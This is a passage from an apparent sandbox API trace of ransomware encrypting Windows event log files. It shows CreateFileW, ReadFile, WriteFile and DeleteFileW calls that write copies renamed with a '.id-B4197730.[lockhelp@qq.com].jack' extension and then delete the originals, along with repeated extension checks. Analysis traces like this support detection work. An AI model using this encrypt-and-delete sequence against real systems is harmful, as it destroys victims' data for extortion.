CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.216] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.217] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.217] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0215.218] GetLastError () returned 0x0 [0215.218] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.221] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.223] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.223] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x12e, lpOverlapped=0x0) returned 1 [0215.223] SetEndOfFile (hFile=0x43c) returned 1 [0215.223] CloseHandle (hObject=0x43c) returned 1 [0215.225] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.226] SetEndOfFile (hFile=0x3d4) returned 1 [0215.227] CloseHandle (hObject=0x3d4) returned 1 [0215.227] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.227] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 1 [0215.228] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.228] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.228] lstrlenW (lpString=".doc") returned 4 [0215.228] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.228] lstrlenW (lpString=".docx") returned 5 [0215.228] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.228] lstrlenW (lpString=".pdf") returned 4 [0215.228] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.228] lstrlenW (lpString=".xls") returned 4 [0215.228] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.228] lstrlenW (lpString=".xlsx") returned 5 [0215.228] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.228] lstrlenW (lpString=".ppt") returned 4 [0215.228] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.228] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.228] lstrlenW (lpString=".zip") returned 4 [0215.317] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.317] lstrlenW (lpString=".rar") returned 4 [0215.317] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.317] lstrlenW (lpString=".bz2") returned 4 [0215.317] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.317] lstrlenW (lpString=".7z") returned 3 [0215.317] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.317] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.317] lstrlenW (lpString=".dbf") returned 4 [0215.318] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".1cd") returned 4 [0215.318] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".jpg") returned 4 [0215.318] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".doc") returned 4 [0215.318] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".docx") returned 5 [0215.318] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.318] lstrlenW (lpString=".pdf") returned 4 [0215.318] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".xls") returned 4 [0215.318] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".xlsx") returned 5 [0215.318] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.318] lstrlenW (lpString=".ppt") returned 4 [0215.318] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".zip") returned 4 [0215.318] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".rar") returned 4 [0215.318] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".bz2") returned 4 [0215.318] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString=".7z") returned 3 [0215.318] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".dbf") returned 4 [0215.318] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.318] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.318] lstrlenW (lpString=".1cd") returned 4 [0215.318] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.319] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0215.319] lstrlenW (lpString=".jpg") returned 4 [0215.319] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.319] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.319] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4WHC.evtx") returned 44 [0215.319] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.325] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0215.325] CloseHandle (hObject=0x3d8) returned 1 [0215.326] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 0x20 [0215.326] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.326] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.326] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.326] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.326] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0215.326] GetLastError () returned 0x0 [0215.326] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0218.013] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0219.657] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.657] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x12c, lpOverlapped=0x0) returned 1 [0219.658] SetEndOfFile (hFile=0x420) returned 1 [0219.658] CloseHandle (hObject=0x420) returned 1 [0219.661] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.661] SetEndOfFile (hFile=0x3d8) returned 1 [0219.663] CloseHandle (hObject=0x3d8) returned 1 [0219.663] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0219.663] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 1 [0219.663] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.663] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString=".doc") returned 4 [0219.664] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".docx") returned 5 [0219.664] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.664] lstrlenW (lpString=".pdf") returned 4 [0219.664] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".xls") returned 4 [0219.664] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".xlsx") returned 5 [0219.664] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.664] lstrlenW (lpString=".ppt") returned 4 [0219.664] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString=".zip") returned 4 [0219.664] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".rar") returned 4 [0219.664] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".bz2") returned 4 [0219.664] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString=".7z") returned 3 [0219.664] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString=".dbf") returned 4 [0219.664] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString=".1cd") returned 4 [0219.664] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString=".jpg") returned 4 [0219.664] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.664] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.665] lstrlenW (lpString=".doc") returned 4 [0219.665] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".docx") returned 5 [0219.665] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.665] lstrlenW (lpString=".pdf") returned 4 [0219.665] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".xls") returned 4 [0219.665] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".xlsx") returned 5 [0219.665] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.665] lstrlenW (lpString=".ppt") returned 4 [0219.665] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.665] lstrlenW (lpString=".zip") returned 4 [0219.665] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".rar") returned 4 [0219.665] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".bz2") returned 4 [0219.665] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString=".7z") returned 3 [0219.665] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.665] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.665] lstrlenW (lpString=".dbf") returned 4 [0219.665] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.665] lstrlenW (lpString=".1cd") returned 4 [0219.665] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.665] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0219.665] lstrlenW (lpString=".jpg") returned 4 [0219.665] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.666] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0219.666] lstrlenW (lpString="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 57 [0219.666] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0219.666] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0219.666] CloseHandle (hObject=0x3d8) returned 1 [0219.666] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 0x20 [0219.666] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.666] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0219.666] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.666] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.666] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0219.667] GetLastError () returned 0x0 [0219.667] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0219.669] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0219.671] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.671] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x146, lpOverlapped=0x0) returned 1 [0219.671] SetEndOfFile (hFile=0x420) returned 1 [0219.671] CloseHandle (hObject=0x420) returned 1 [0219.673] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.673] SetEndOfFile (hFile=0x3d8) returned 1 [0219.675] CloseHandle (hObject=0x3d8) returned 1 [0219.675] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0219.675] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 1 [0219.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.676] lstrlenW (lpString=".doc") returned 4 [0219.676] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".docx") returned 5 [0219.676] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.676] lstrlenW (lpString=".pdf") returned 4 [0219.676] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".xls") returned 4 [0219.676] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".xlsx") returned 5 [0219.676] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.676] lstrlenW (lpString=".ppt") returned 4 [0219.676] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.676] lstrlenW (lpString=".zip") returned 4 [0219.676] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".rar") returned 4 [0219.676] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".bz2") returned 4 [0219.676] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.676] lstrlenW (lpString=".7z") returned 3 [0219.676] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString=".dbf") returned 4 [0219.677] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString=".1cd") returned 4 [0219.677] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString=".jpg") returned 4 [0219.677] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString=".doc") returned 4 [0219.677] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString=".docx") returned 5 [0219.677] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.677] lstrlenW (lpString=".pdf") returned 4 [0219.677] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString=".xls") returned 4 [0219.677] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString=".xlsx") returned 5 [0219.677] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.677] lstrlenW (lpString=".ppt") returned 4 [0219.677] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.677] lstrlenW (lpString=".zip") returned 4 [0219.678] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.678] lstrlenW (lpString=".rar") returned 4 [0219.678] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.678] lstrlenW (lpString=".bz2") returned 4 [0219.678] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.678] lstrlenW (lpString=".7z") returned 3 [0219.678] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.678] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.678] lstrlenW (lpString=".dbf") returned 4 [0219.678] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.678] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.678] lstrlenW (lpString=".1cd") returned 4 [0219.678] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.678] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0219.678] lstrlenW (lpString=".jpg") returned 4 [0219.678] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.678] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0219.678] lstrlenW (lpString="Microsoft-Windows-Winlogon%4Operational.evtx") returned 44 [0219.678] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0219.679] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0219.679] CloseHandle (hObject=0x3d8) returned 1 [0219.679] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 0x20 [0219.679] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.679] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0219.679] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.679] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.679] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0219.680] GetLastError () returned 0x0 [0219.680] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0222.594] WriteFile (hFile=0x420, 